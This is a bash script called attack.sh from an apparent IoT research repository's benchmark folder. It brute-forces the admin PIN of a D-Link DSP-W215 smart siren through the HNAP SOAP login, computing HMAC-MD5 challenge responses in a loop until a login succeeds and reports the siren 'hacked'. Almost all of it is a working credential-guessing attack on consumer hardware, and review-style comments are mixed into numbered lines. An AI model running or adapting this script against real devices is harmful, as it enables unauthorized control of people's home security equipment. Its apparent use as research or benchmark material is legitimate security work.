Adding config file for sharing.
[iot2.git] / benchmarks / other / DLinkAlarm / attack.sh
1 #!/bin/bash
2 #modify next two line for your DSP-W215
3 IP="192.168.0.4"
4 #PIN=0
5 PIN=215500
6 #do not modify after this line if you don't know what you are doing
7
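#######################################
# Print the command-line synopsis to stdout.
# NOTE(review): none of the options listed here are parsed anywhere in the
# visible part of this script, and nothing visible calls usage. Confirm
# whether this text was carried over from another tool.
# Arguments: none (reads $0 for the script name)
# Outputs:   usage text on stdout
#######################################
function usage {
  local script_name
  # Quote "$0" and pass "--" so a script path containing spaces or starting
  # with a dash is treated as a single operand.
  script_name=$(basename -- "$0")
  # printf with fixed format strings replaces echo -e; the output is the same.
  printf '\nUsage: %s [OPTION]\n' "$script_name"
  printf '\nOPTION:\n'
  printf '\t--getstate\n'
  printf '\t--stop\n'
  printf '\t--noise SoundType(1-6) Volume(0-100) Duration(??)\n'
}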
15
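#######################################
# Compute an HMAC-MD5 and print it as uppercase hex.
# Arguments: $1 - message to authenticate
#            $2 - HMAC key
# Outputs:   the digest as uppercase hex on stdout (xxd -ps -u)
# Requires:  openssl, xxd
#######################################
function hash_hmac {
  # local keeps these from overwriting same-named variables in the caller.
  local data="$1"
  local key="$2"
  # printf '%s' emits the message byte-for-byte with no trailing newline;
  # echo -n would treat a message such as "-n" or "-e" as an option.
  # NOTE: the key is passed on the openssl command line, so it is visible
  # in the local process list while openssl runs.
  printf '%s' "$data" | openssl dgst "-md5" -hmac "$key" -binary | xxd -ps -u
}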
21
# HTTP headers sent with every HNAP Login call.
contentType='Content-Type: text/xml; charset=utf-8'
soapLogin='SOAPAction: "http://purenetworks.com/HNAP1/Login"'

# SOAP envelope opening and closing, shared by both Login messages.
head='<?xml version="1.0" encoding="utf-8"?>'
head+='<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
head+='<soap:Body>'
end='</soap:Body></soap:Envelope>'

# First Login message (Action "request"). No earlier line in this script
# assigns $password, so LoginPassword is empty here unless the variable is
# inherited from the environment.
message='<Login xmlns="http://purenetworks.com/HNAP1/"><Action>request</Action><Username>admin</Username><LoginPassword>'"${password}"'</LoginPassword><Captcha/></Login>'
loginrequest="${head}${message}${end}"
32
33 loop=true
34 while $loop
35       do
36
37 ret=`curl -s -X POST -H "$contentType" -H "$soapLogin" --data-binary "$loginrequest" http://$IP/HNAP1`
38
39 function getResult {
40   opt=`echo -n "$ret" | grep -Po "(?<=<$1>).*(?=</$1>)"`
41   echo -n "$opt"
42 }
43
44 echo -e "Current pin: $PIN"
45 let PIN=$PIN+1
46 challenge=`getResult Challenge`
47 cookie="Cookie: uid=`getResult Cookie`"
48 publickey="`getResult PublicKey`$PIN"
49 echo -e "Public key: $publickey"
50 privatekey=`hash_hmac "$challenge" "$publickey"`
51 password=`hash_hmac "$challenge" "$privatekey"`
52 timestamp=`date +%s`
53 auth_str="$timestamp\"http://purenetworks.com/HNAP1/Login\""
54 auth=`hash_hmac "$auth_str" "$privatekey"`
55 hnap_auth="HNAP_AUTH: $auth $timestamp"
56
57 message="<Login xmlns=\"http://purenetworks.com/HNAP1/\"><Action>login</Action><Username>admin</Username><LoginPassword>$password</LoginPassword><Captcha/></Login>"
58
59 login="$head$message$end"
60
61 #Get Login Result
62 mret=`curl -s -X POST -H "$contentType" -H "$soapLogin" -H "$hnap_auth" -H "$cookie" --data-binary "$login" http://$IP/HNAP1`
63
64 echo -e "$mret"
65 status=`echo -n "$mret" | grep -Po "(?<=<LoginResult>).*(?=</LoginResult>)"`
66 echo -e "Status: $status\n\n"
67 if [ $status = "success" ]
68 then
69     echo -e "SUCCESSFUL ATTEMPT: Siren hacked successfully! The pin is: $PIN\n\n\n"
70     loop=false
71 fi
72
73 done
74